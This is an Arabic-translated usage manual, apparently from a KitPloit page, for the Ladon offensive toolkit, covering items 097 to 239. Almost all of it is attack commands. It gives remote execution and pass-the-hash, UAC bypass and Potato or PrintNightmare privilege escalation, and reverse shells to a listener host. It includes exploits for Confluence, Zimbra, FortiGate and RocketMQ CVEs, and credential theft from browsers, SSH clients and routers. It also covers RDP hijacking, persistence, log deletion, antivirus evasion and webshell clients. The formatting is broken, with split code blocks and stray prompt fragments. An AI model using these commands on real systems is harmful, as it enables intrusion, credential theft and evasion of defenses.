##### 097 عرض الأنابيب المسماة المحلية```Bash
Ladon GetPipe
098 RdpLog عرض سجلات اتصال 3389```Bash

Ladon RdpLog

root@kitploit:~
### التنفيذ عن بُعد (psexec/wmiexec/atexec/sshexec/smbexec)

![image](http://k8gege.org/k8img/Ladon/Study/Rexec.PNG)

##### المنفذان 099 و445: تنفيذ أوامر PSEXEC عن بُعد مشفّر (تفاعلي)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
100 المنفذ 135 WmiExec تنفيذ الأوامر عن بُعد (غير تفاعلي)```Bash

Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### تنفيذ أوامر AtExec عن بُعد على المنفذين 101 و445 (غير تفاعلي)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 المنفذ 22 SshExec تنفيذ الأوامر عن بُعد (غير تفاعلي)```Bash

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

root@kitploit:~
##### 103 تنفيذ أوامر JspShell عن بُعد (غير تفاعلي) أُزيل في 9.3.0
الاستخدام:Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 WebShell تنفيذ الأوامر عن بُعد (غير تفاعلي) تمت الإزالة في 9.3.0```Bash

Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo

root@kitploit:~
##### المنفذان 105 و135 WmiExec2 تنفيذ الأوامر عن بُعد يدعم HASH (غير تفاعلي) يدعم رفع الملفات```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami		 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe  先Mimikatz注入Hash,再pth执行命令
106 منفذ 445 SmbExec Ntlm-Hash تنفيذ أوامر عن بُعد غير تفاعلي (بدون صدى)```Bash

Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p

root@kitploit:~
##### 107 WinrmExec تنفيذ الأوامر عن بُعد بدون صدى (يدعم صلاحيات System)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

رفع الامتيازات وخفضها

image

108 whoami لعرض صلاحيات وامتيازات المستخدم الحالي```Bash

Ladon whoami

root@kitploit:~
##### 109  6 أنواع BypassUAC للقائمة البيضاء (بعد 8.0) Win7-Win10  تمت الإزالة في الإصدار 10.8 محفوظ فقط في 911
الاستخدام: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 تجاوز تنفيذ UAC, يدعم Win7-Win10 أُزيل في الإصدار 10.8 محفوظ فقط في 911```Bash

Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat

root@kitploit:~
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) EXP لرفع الامتيازات عبر ثغرة الطابعة```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFool EXP استغلال ثغرة الطابعة لرفع الامتيازات```Bash

Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll

root@kitploit:~
##### 113 GetSystem رفع الصلاحيات إلى مستوى النظام وتنفيذ CMD```Bash
Ladon GetSystem cmd.exe
114 نسخ الرمز المميز لتنفيذ CMD (مثل خفض صلاحيات system إلى مستخدم explorer الحالي)```Bash

Ladon GetSystem cmd.exe explorer

root@kitploit:~
##### 115 Runas محاكاة تنفيذ الأوامر كمستخدم```Bash
Ladon Runas user pass cmd
116 رفع الصلاحيات إلى SYSTEM عبر MS16135```Bash

Ladon ms16135 whoami >=9.2.1版本移除 911保留

root@kitploit:~
##### 117 BadPotato تصعيد صلاحيات مستخدم الخدمة إلى SYSTEM```Bash
Ladon BadPotato cmdline
118 رفع صلاحيات مستخدم الخدمة SweetPotato إلى SYSTEM```Bash

Ladon SweetPotato cmdline

root@kitploit:~
##### 119 EfsPotato Win7-2019 تصعيد الامتيازات (رفع صلاحيات مستخدم الخدمة إلى system)```Bash
Ladon EfsPotato whoami
120 Open3389 فتح 3389 بنقرة واحدة```Bash

Ladon Open3389

root@kitploit:~
##### 121 تفعيل المدير المدمج Administrator```Bash
Ladon ActiveAdmin
122 تفعيل المستخدم المدمج Guest```Bash

Ladon ActiveGuest

root@kitploit:~
### Shell عكسي

##### 123 Shell عكسي TCP NC```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
124 شل MSF العكسي عبر TCP```Bash

Ladon ReverseTcp 192.168.1.8 4444 shell

root@kitploit:~
##### 125 TCP عكسي MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
126 HTTP عكسي MSF MET Shell```Bash

Ladon ReverseHttp 192.168.1.8 4444

root@kitploit:~
##### 127 HTTPS عكسي MSF MET Shell```Bash
Ladon ReverseHttps 192.168.1.8 4444
128 TCP عكسي CMD & PowerShell Shell```Bash

Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh

root@kitploit:~
##### 129 عكسي UDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
130 netsh: تحويل المنفذ 888 المحلي إلى المنفذ 22 الخاص بـ 112```Bash

Ladon netsh add 888 192.168.1.112 22

root@kitploit:~
##### 131  PortTran إعادة توجيه المنفذ (مثال 3389)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338

التنفيذ المحلي

132 اختطاف جلسة سطح المكتب RDP (بدون كلمة مرور)```Bash

Ladon RdpHijack 3 Ladon RdpHijack 3 console

root@kitploit:~
##### 133 إضافة عنصر بدء التشغيل Run في السجل```Bash
Ladon RegAuto Test c:\123.exe
134 برنامج تنفيذ المهام المجدولة AT (بدون وقت) (صلاحيات النظام)```Bash

Ladon at c:\123.exe Ladon at c:\123.exe gui

root@kitploit:~
##### 135 خدمة SC إضافة عنصر بدء التشغيل وتنفيذ برنامج (بصلاحيات النظام)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName

استكشاف معلومات النظام

136 اكتشاف نظام التشغيل والأجهزة والمعلومات الأخرى عبر بروتوكول Snmp```Bash

Ladon 192.168.1.8/24 SnmpInfo

root@kitploit:~
##### 137  استكشاف اسم مضيف Windows والمجال والمستخدم عبر بروتوكول Nbt```Bash
Ladon 192.168.1.8/24 NbtInfo
138 استكشاف إصدار Windows واسم المضيف والمجال عبر بروتوكول Smb```Bash

Ladon 192.168.1.8/24 SmbInfo

root@kitploit:~
##### 139  استطلاع إصدار Windows واسم المضيف والمجال عبر بروتوكول Wmi```Bash
Ladon 192.168.1.8/24 WmiInfo
140 كشف إصدار Windows واسم المضيف والمجال عبر بروتوكول Mssql```Bash

Ladon 192.168.1.8/24 MssqlInfo

root@kitploit:~
##### 141  بروتوكول Winrm لاستكشاف إصدار Windows واسم المضيف والمجال```Bash
Ladon 192.168.1.8/24 WinrmInfo
142 Exchange اكتشاف إصدار Windows واسم المضيف والمجال```Bash

Ladon 192.168.1.8/24 ExchangeInfo

root@kitploit:~
##### 143  اكتشاف إصدار Windows واسم المضيف والمجال عبر بروتوكول Rdp```Bash
Ladon 192.168.1.8/24 RdpInfo

ميزات أخرى

144 Win2008 تمكين .NET 3.5 بنقرة واحدة```Bash

Ladon EnableDotNet

root@kitploit:~
##### 145 الحصول على كود HTML المصدري لموقع الشبكة الداخلية```Bash
Ladon gethtml http://192.168.1.1
146 خادم ويب مصغر بنقرة واحدة خادم ويب مخصص لمراقبة الاختراق```Bash

Ladon web 80 Ladon web 80 dir

root@kitploit:~
الحصول على IP الخارجي (تشغيل WEB على VPS، ويقوم الهدف بزيارة ip.txt أو ip.jpg)
http://192.168.1.8/ip.txt

##### 147 getstr/getb64/debase64/savetxt(استرجاع نتيجة ثغرة بدون صدى)
##### الاستماع```Bash
Ladon web 800
إرسال وإرجاع النص الصريح```Bash

certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456

root@kitploit:~
##### نتيجة تشفير Base64```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
فك تشفير نتيجة Base64```Bash

certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw

root@kitploit:~
##### 148 كشف مكوّن Shiro```Bash
Ladon 192.168.1.8/24 IsShiro
149 LogDelTomcat حذف سجلات IP المحددة لـ Tomcat```Bash

Ladon LogDelTomcat access.log 192.168.1.8

root@kitploit:~
##### 150 فحص إضافات التجميعات المخصصة لـ C#```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
151 ReadFile قراءة محتوى بطول محدد من بداية ملف كبير```Bash

Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M

root@kitploit:~
##### 152 تعديل السجل لقراءة كلمات المرور النصية الصريحة لأنظمة 2012 وما بعدها```Bash
Ladon SetMzLogonPwd 1
153 تعديل سجل النظام لاختطاف شهادات التوقيع```Bash

Ladon SetSignAuth 1

root@kitploit:~
##### 154 IP24 تحويل IP بكميات كبيرة إلى تنسيق ip24 (192.168.1.1/24)```Bash
Ladon ip.txt IP24
155 IPC تحويل IP بالجملة إلى تنسيق C (192.168.1.)```Bash

Ladon ip.txt IPC

root@kitploit:~
##### 156 IPB  تحويل IP بشكل مجمّع إلى تنسيق B (192.168.)```Bash
Ladon ip.txt IPB
157 كشف الثغرات Atlassian Confluence CVE-2022-26134```Bash

Ladon url.txt CVE-2022-26134

root@kitploit:~
##### 158 Atlassian Confluence CVE-2022-26134 EXP```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
159 RevShell-2022-26134 CVE-2022-26134 Shell عكسي```Bash

Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444

root@kitploit:~
##### 160 SslInfo لاكتشاف معلومات الشهادات، بما في ذلك الأجهزة وعناوين IP وأسماء النطاقات وأسماء الآلات والمؤسسات وغيرها```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
161 SslInfo استكشاف جماعي للشهادات لتحديد الأجهزة وعناوين IP وأسماء النطاقات وأسماء الآلات والمؤسسات وغيرها من المعلومات```Bash

Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo

root@kitploit:~
##### 162 WPinfo طرق متعددة للحصول على إصدارات برنامج WordPress الرئيسي والقوالب والإضافات```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
163 WPinfo الحصول المجمّع على إصدارات برنامج WordPress الرئيسي والمواضيع والإضافات```Bash

Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo

root@kitploit:~
##### 164  كسر القوة الغاشمة لـ Exchange  اكتشاف كسر كلمات مرور Exchange```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
165 CVE-2022-27925 الفحص الجماعي لثغرة RCE الخاصة باجتياز الدليل عبر ZIP في خادم بريد Zimbra```Bash

Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925

root@kitploit:~
##### 166 EXP-2022-27925 استغلال ثغرة RCE غير مصرح بها في خادم بريد Zimbra GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
167 WebShellCmd الاتصال بـ WebShell الخاص بـ jsp (يدعم cd وk8 وua وuab64)```Bash

Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### JSP UAshell عرض إصدار النظام ومعلومات python وgcc وغيرها لتسهيل رفع الصلاحيات```Bash
Ladon WebShell jsp ua https://zimbra.k8gege.org pass OSinfo
168 WebShellCmd اتصال بـ jsp WebShell (يدعم cd وk8 وua وuab64)```Bash

Ladon WebShell jsp uab64 https://zimbra.k8gege.org pass whoami

root@kitploit:~
##### 169 تنفيذ الأوامر على الباب الخلفي IIS-Raid عبر اتصال غير تفاعلي```Bash
Ladon IISdoor http://192.168.1.142 whoami
Ladon IISdoor http://192.168.1.142 SIMPLEPASS whoami
170 FindIP مطابقة شريحة IP لما إذا كانت تظهر في نتائج الثغرات```Bash

Ladon FindIP ipc.txt ISVUL.txt (精确搜索) Ladon FindIP ipc.txt ISVUL.txt like (模糊搜索)

root@kitploit:~
##### 171 CiscoPwd CVE-2019-1653 Cisco RV320 RV325 قراءة كلمة مرور جهاز التوجيه```Bash
Ladon https://192.168.1.8 CiscoPwd
Ladon url.txt CiscoPwd 批量探测Cisco漏洞并导出用户密码
172 PrinterPoc فحص جماعي لثغرة تنفيذ الأكواد التعسفي في طابعات PJL```Bash

Ladon 192.168.1.8 PrinterPoc Ladon ip.txt PrinterPoc 禁ping机器扫描使用noping Ladon noping 192.168.1.8 PrinterPoc Ladon noping ip.txt PrinterPoc

root@kitploit:~
##### 173 الاستعلام عن الشركة المصنعة عبر Mac (Ladon Mac MAC address)```Bash
Ladon Mac ff-ff-ff-ff-ff-ff
Ladon Mac 01:00:5e:00:00:16
Ladon Mac ff5e00885d66
174 تكسير كلمة مرور راوتر Cisco VPN (كلمات مرور افتراضية مدمجة، تدعم النص العادي وHash)```Bash

Ladon 192.168.1.8/24 CiscoScan Ladon https://192.168.1.8 CiscoScan Ladon ip.txt CiscoScan Ladon url.txt CiscoScan​

root@kitploit:~
##### 175 vsFTPdPoc	CVE-2011-2523 vsftpd 2.3.4 كشف ثغرة الباب الخلفي المبتسم  محذوف في 10.9```Bash
Ladon noping ip CVE-2011-2523
Ladon noping ip.txt vsFTPdPoc  
176 WpScan تدقيق كلمات مرور WordPress وكلمات المرور الضعيفة```Bash

Ladon http://192.168.1.8 WpScan Ladon url.txt WpScan Ladon 192.168.1.8/24 WpScan http 扫描IP时添加http://

root@kitploit:~
##### 177  اكتشاف إصدار Exchange```Bash
Ladon https://192.168.1.8 ExchangeVer
Ladon 192.168.1.8/24 ExchangeVer
Ladon url.txt ExchangeVer
178 كشف ثغرات RCE عالية الخطورة في Exchange```Bash

Ladon https://192.168.1.8 ExchangePoc

root@kitploit:~
##### 179 الحصول على معلومات ترويسة استجابة صفحة الويب عبر Http/S```Bash
Ladon https://192.168.1.8 GetHead
Ladon ip.txt GetHead
Ladon 192.168.1.8/24 GetHead http  扫描IP时添加http://
Ladon ip.txt GetHead https		   扫描IP时添加https://
180 Http/S الحصول على معلومات ترويسة استجابة صفحة الويب + الكود المصدري```Bash

Ladon https://192.168.1.8 GetHtml Ladon ip.txt GetHtml Ladon 192.168.1.8/24 GetHtml http Ladon ip.txt GetHtml https 扫描IP时添加https://

root@kitploit:~
##### 181 Http/S استخراج أسماء النطاقات من صفحات الويب```Bash
Ladon https://192.168.1.8 GetDomain
Ladon ip.txt GetDomain
Ladon 192.168.1.8/24 GetDomain http
Ladon ip.txt GetDomain https	扫描IP时添加https://
182 TrueIP تجاوز CDN للحصول على عنوان IP الحقيقي للنطاق (استخدام ميزات الكلمات المفتاحية الفريدة مثل النطاق والعنوان وBanner وغيرها)```Bash

Ladon ip.txt TrueIP k8gege.org Ladon 192.168.1.8/24 TrueIP k8gege.org Ladon ip.txt TrueIP "K8哥哥" Ladon 192.168.1.8/24 TrueIP "K8哥哥"

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 183 قراءة كلمات مرور Firefox\Cookie\السجل```Bash
Ladon FirefoxPwd
Ladon FirefoxHistory
Ladon FirefoxCookie
184 BypassUAC11 بدون إخراج يدعم Win7 وWin8 وWin11 وWin2012\2016\2019 وغيرها، أُزيل في الإصدار 10.8```Bash

Ladon40 BypassUAC11 cmd Ladon40 BypassUAC11 c:\1.bat Ladon40 BypassUAC11 c:\1.exe

root@kitploit:~
##### 185 GetPwd يدعم قراءة كلمات مرور Navicat وTeamView وXshell وSecureCRT```Bash
Ladon GetPwd
186 DraytekScan تدقيق كلمات المرور وكشف كلمات المرور الضعيفة في Draytek```Bash

Ladon 192.168.1.8 DraytekScan Ladon https://192.168.1.8 DraytekScan Ladon 192.168.1.8/24 DraytekScan Ladon url.txt DraytekScan

root@kitploit:~
##### 187 XshellPwd قراءة كلمات مرور Xshell```Bash
Ladon XshellPwd
188 FortiGate CVE-2022-40684 كتابة غير مصرح بها لـ SSH-KEY admin admin123```Bash

Ladon 192.168.1.8 CVE-2022-40684 Ladon https://192.168.1.8 CVE-2022-40684 Ladon 192.168.1.8/24 CVE-2022-40684 Ladon url.txt CVE-2022-40684

root@kitploit:~
##### 189 MssqlCmd  تنفيذ الأوامر عن بُعد على SQL Server إصدار SQL، معلومات OS xp_cmdshell```Bash
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info  
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
190 MssqlCmd تنفيذ الأوامر عن بُعد على SQL Server ورفع الامتيازات عبر efspotato وbadpotato```Bash

Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami

root@kitploit:~
##### 191 CVE-2018-14847 Mikrotik RouterOS قراءة كلمة المرور للإصدارات 6.29-6.42```Bash
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
192 ZteScan كشف كلمات المرور الافتراضية لراوترات ومودمات الألياف الضوئية من ZTE```Bash

Ladon 192.168.1.8 ZteScan Ladon ip.txt ZteScan Ladon http://192.168.1.8 ZteScan Ladon url.txt ZteScan

root@kitploit:~
##### 193 MSNSwitchPwd CVE-2022-32429 قراءة كلمة مرور راوتر MSNSwitch```Bash
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd
194 NetGearPwd قراءة كلمة مرور جهاز التوجيه NetGear DGND3700v2```Bash

Ladon https://192.168.1.8 NetGearPwd Ladon url.txt NetGearPwd

root@kitploit:~
##### 195 كشف إصدار WebLogic عبر بروتوكول T3```Bash
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info

اختراق بنقرة واحدة InfoScan AllScan PocScan ExpScan VerScan

image

196 InfoScan وحدات متعددة لاكتشاف معلومات النظام```Bash

Ladon 192.168.1.8/24 InfoScan Ladon 192.168.1.8 InfoScan Ladon ip.txt InfoScan

root@kitploit:~
##### 197 VulScan PocScan كشف ثغرات متعددة عن بُعد```Bash
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
198 ExpScan استغلال ثغرات متعددة GetShell```Bash

Ladon 192.168.1.8/24 ExpScan Ladon 192.168.1.8 ExpScan Ladon http://192.168.1.8 ExpScan

root@kitploit:~
##### 199 JoomlaPwd CVE-2023-23752 قراءة غير مصرح بها لكلمة مرور قاعدة بيانات الموقع```Bash
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
200 AllScan جميع الوحدات```Bash

Ladon 192.168.1.8/24 AllScan Ladon 192.168.1.8 AllScan Ladon http://192.168.1.8 AllScan

root@kitploit:~
##### 201 اكتشاف إصدار Citrix Gateway```Bash
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
202 كشف إصدار Vmware Vcenter```Bash

Ladon https://192.168.1.8 VmwareVer Ladon 192.168.1.8/24 VmwareVer Ladon url.txt VcenterVer

root@kitploit:~
##### 203 تجاوز Defender لتنفيذ PowerShell```Bash
Ladon RunPS -f hello.ps1
Ladon RunPS -c "echo test"
Ladon RunPS bypass
Ladon RunPS default
204 إعادة تشغيل طابعة HP عبر SNMP```Bash

Ladon HPreboot 192.168.1.8 Ladon HPreboot 192.168.1.8 public

root@kitploit:~
##### 205 تنظيف سجلات التشغيل تعطيل تسجيل .NET```Bash
Ladon Clslog
206 اكتشاف المضيفين النشطين عبر بروتوكول ARP```Bash

Ladon 192.168.1.8 ArpInfo Ladon 192.168.1.8/24 ArpInfo

root@kitploit:~
##### 207 خادم FTP مصغّر، (يدعم أوامر ftp المدمجة في windows/Linux لرفع وتنزيل الملفات)```Bash
Ladon FtpServer 21
Ladon Ftp 2121
Ladon Ftp 2121 admin admin
208 مراقبة بيانات حزم TCP المرسلة وحفظها بصيغة TXT وHEX مثل بروتوكولات SMB RDP HTTP SSH LDAP FTP وغيرها```Bash

Ladon Tcp 8080 Ladon TcpServer 80

root@kitploit:~
##### 209 مراقبة بيانات حزم UDP المرسلة وحفظها بصيغة TXT وHEX مثل بروتوكولات DNS وSNMP وغيرها```Bash
Ladon UdpServer 8080
Ladon Udp 161
210 PortForward إعادة توجيه المنافذ ترحيل المنافذ```Bash

Ladon PortForward Example: Ladon PortForward 338 192.168.1.8 3389 Test: mstsc 127.0.0.1 338

root@kitploit:~
##### 211 CVE-2022-36537	Server Backup Manager كشف ثغرات RCE غير المصرح بها (Zookeeper)```Bash
Ladon https://192.168.1.8 CVE-2022-36537
Ladon 192.168.1.8/24 CVE-2022-36537
Ladon url.txt CVE-2022-36537
212 EXP-2022-36537 Zookeeper استغلال قراءة ملف غير مصرح به (افتراضي/WEB-INF/web.xml)```Bash

Ladon EXP-2022-36537 url Ladon EXP-2022-36537 url /WEB-INF/web.xml

root@kitploit:~
##### 213 الإغلاق الكامل لـSMB وتعطيل المنفذ 445 لمنع هجمات 0day والحركة الجانبية وهجمات الترحيل وغيرها```Bash
Ladon CloseSMB
214 تعطيل الخدمة المحددة```Bash

Ladon DisService Spooler Ladon DisableService Spooler

root@kitploit:~
##### 215 إيقاف الخدمة المحددة```Bash
Ladon StopService Spooler
216 المنافذ المسموح بها المنافذ المفتوحة```Bash

Ladon OpenTCP 445 Ladon OpenUDP 161

root@kitploit:~
##### 217 منع المنافذ اعتراض المنافذ```Bash
Ladon CloseTCP  445
Ladon CloseUDP  161
218 RunToken برنامج نسخ الرموز وتنفيذها```Bash

Ladon RunToken explorer cmd.exe Ladon RunToken explorer c:\1.bat

root@kitploit:~
##### 219 تصعيد صلاحيات RunSystem: رفع صلاحيات المسؤول إلى صلاحيات SYSTEM```Bash
Ladon RunSystem cmd.exe
Ladon RunUser cmd.exe
Ladon RunSystem c:\1.exe
220 تخفيض صلاحيات RunUser خفض صلاحيات النظام إلى تنفيذ البرامج كمستخدم```Bash

Ladon RunUser cmd.exe Ladon RunUser c:\1.exe

root@kitploit:~
##### 221 GodPotato رفع الامتيازات Win8-Win11 Win2012-Win2022```Bash
Ladon GodPotato whoami
222 hikvision هيكفيجن تدقيق كلمات المرور```Bash

Ladon 192.168.1.8/24 HikvisionScan Ladon http://192.168.1.8:8080 HikvisionScan Ladon url.txt HikvisionScan

root@kitploit:~
##### 223 hikvision هيكفيجن CVE-2017-7921 كشف الثغرات```Bash
Ladon 192.168.1.8/24 HikvisionPoc
Ladon http://192.168.1.8:8080 HikvisionPoc
Ladon url.txt HikvisionPoc
224 hikvision هيكفيجن فك تشفير ملفات التكوين```Bash

Ladon HikvisionDecode configurationFile

root@kitploit:~
##### 225 Ladon CmdShell مخصص للاختبار```Bash
Ladon web 800 cmd
226 CmdShell مخصص لاختبار الاتصال```Bash

Ladon cmdshell http://192.168.50.2:888 cmd whoami 浏览器访问 http://192.168.1.8:800/shell?cmd=whoami

root@kitploit:~
##### 227 عرض مسؤولي المجال```Bash
Ladon QueryAdminDomain
228 عرض معلومات المجال```Bash

Ladon QueryDomain

root@kitploit:~
##### 229 استكشاف معلومات راوترات Mikrotik على نفس الشبكة الفرعية عبر بث بروتوكول Mndp```Bash
Ladon MndpInfo
Ladon RouterOS
Ladon Mikrotik
230 أداة اتصال PostShell، تدعم إرسال رؤوس HTTP مخصصة```Bash

Ladon PostShell Ladon PostShell POST http://192.168.50.18/post.jsp tom cmd whoami Ladon PostShell POST http://192.168.50.18/post.jsp tom b64cmd d2hvYW1p Ladon PostShell POST http://192.168.50.18/post.jsp tom base64 d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom cmd whoami Ladon PostShell UA http://192.168.50.18/ua.jsp tom b64cmd d2hvYW1p Ladon PostShell UA http://192.168.50.18/ua.jsp tom base64 d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom cmd whoami Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom b64cmd d2hvYW1p Ladon PostShell Cookie http://192.168.50.18/ck.jsp tom base64 d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Referer http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Referer http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell Destination http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell Destination http://192.168.50.18/re.jsp tom base64 d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom cmd whoami Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom b64cmd d2hvYW1p Ladon PostShell HttpBasic http://192.168.50.18/re.jsp tom base64 d2hvYW1p

root@kitploit:~
##### 231 RunCmd/Cmd  تنفيذ أمر Cmd / يدعم b64cmd```Bash	
Ladon cmd whoami
Ladon b64cmd d2hvYW1p 
232 عرض عنوان IP الخاص بالمسؤول، قراءة سجلات تسجيل الدخول الناجحة 4624 بضغطة واحدة```Bash

Ladon LoginLog Ladon EventLog

root@kitploit:~
##### 233 Apache RocketMQ CVE-2023-33246 ثغرة تنفيذ الأوامر عن بُعد EXP```Bash	
Ladon RocketMQexp <ip> 10911 <command>
Ladon RocketMQexp 192.168.1.8 10911 "wget http://192.168.1.8/isvul"
234 أداة Ladon للتهرب من برامج مكافحة الفيروسات بضغطة واحدة```Bash

Ladon BypassAV py xor anyNet.exe

root@kitploit:~
##### 235 رفع صلاحيات نظام Win11/2022 إلى صلاحية system```Bash	
Ladon McpPotato whoami
236 تحويل EXE إلى HEX، كتابة أمر CMD إلى ملف```Bash

Ladon Exe2Hex 1.exe

root@kitploit:~
##### 237 تحويل EXE إلى Base64، كتابة أمر CMD إلى ملف```Bash	
Ladon Exe2B64 1.exe
238 ZimbraVer اكتشاف إصدار نظام بريد Zimbra```Bash

Ladon 192.168.1.8/24 ZimbraVer Ladon http://192.168.1.8:8080 ZimbraVer Ladon url.txt ZimbraVer

root@kitploit:~
##### 239 SharpGPO أداة اختراق المجال والحركة الجانبية عبر نهج المجموعة```Bash	
Ladon SharpGPO

Ladon SharpGPO --Action GetOU
Ladon SharpGPO --Action GetOU --OUName "IT Support"

Ladon SharpGPO --Action NewOU --OUName "IT Support"
Ladon SharpGPO --Action NewOU --OUName "App Dev" --BaseDN "OU=IT Support,DC=testad,DC=com"

